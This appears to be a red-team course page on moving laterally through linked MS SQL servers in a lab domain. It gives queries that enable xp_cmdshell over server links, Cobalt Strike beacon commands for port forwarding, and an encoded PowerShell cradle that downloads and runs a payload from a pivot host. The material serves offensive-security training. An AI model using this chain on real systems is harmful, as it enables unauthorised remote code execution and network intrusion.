MS SQL Lateral Movement

SQL Servers have a concept called "links", which allows a database instance to access data from an external source. MS SQL supports multiple sources, including other MS SQL Servers. These can also be practically anywhere - including other domains, forests or in the cloud.

We can discover any links that the current instance has:

SELECT srvname, srvproduct, rpcout FROM master..sysservers;

\

\

This shows a link to sql-1.cyberbotic.io which we can query using OpenQuery:

SELECT * FROM OPENQUERY("sql-1.cyberbotic.io", 'select @@servername');

The use of double and single quotes is important when using OpenQuery.

We can also check the xp_cmdshell status.

SELECT * FROM OPENQUERY("sql-1.cyberbotic.io", 'SELECT * FROM sys.configurations WHERE name = ''xp_cmdshell''');

\

If xp_cmdshell is disabled, you won't be able to enable it by executing sp_configure via OpenQuery. If RPC Out is enabled on the link (which is not the default configuration), then you can enable it using the following syntax:

EXEC('sp_configure ''show advanced options'', 1; reconfigure;') AT [sql-1.cyberbotic.io]
EXEC('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT [sql-1.cyberbotic.io]

The square braces are required.

\

Manually querying databases to find links can be cumbersome and time-consuming, so you can also use Get-SQLServerLinkCrawl to automatically crawl all available links.

beacon> powershell Get-SQLServerLinkCrawl -Instance "sql-2.dev.cyberbotic.io,1433"

Version     : SQL Server 2019 
Instance    : SQL-2
CustomQuery : 
Sysadmin    : 1
Path        : {SQL-2}
User        : DEV\bfarmer
Links       : {SQL-1.CYBERBOTIC.IO}

Version     : SQL Server 2019 
Instance    : SQL-1
CustomQuery : 
Sysadmin    : 1
Path        : {SQL-2, SQL-1.CYBERBOTIC.IO}
User        : sa
Links       :

\

This output shows that the link from SQL-2 to SQL-1 is configured with a local 'sa' account, and that it has sysadmin privileges on the remote server.

To execute a Beacon on SQL-1, we can pretty much repeat the same steps as previously. However, note that SQL-1 may only be able to talk to SQL-2 and not to WKSTN-2 or any other machine in the DEV domain.

beacon> run hostname
sql-2

beacon> getuid
[*] You are DEV\mssql_svc (admin)

beacon> powershell New-NetFirewallRule -DisplayName "8080-In" -Direction Inbound -Protocol TCP -Action Allow -LocalPort 8080

beacon> rportfwd 8080 127.0.0.1 80
[+] started reverse port forward on 8080 to 127.0.0.1:80

\

Because of all of the additional quotes needed for OpenQuery, it's easier to use an encoded command.

SELECT * FROM OPENQUERY("sql-1.cyberbotic.io", 'select @@servername; exec xp_cmdshell ''powershell -w hidden -enc aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AcwBxAGwALQAyAC4AZABlAHYALgBjAHkAYgBlAHIAYgBvAHQAaQBjAC4AaQBvADoAOAAwADgAMAAvAGIAJwApAA==''')

The inclusion of a benign statement at the beginning of the query is required for xp_cmdshell to trigger.

\

beacon> link sql-1.cyberbotic.io TSVCPIPE-ae2b7dc0-4ebe-4975-b8a0-06e990a41337
[+] established link to child beacon: 10.10.120.25

\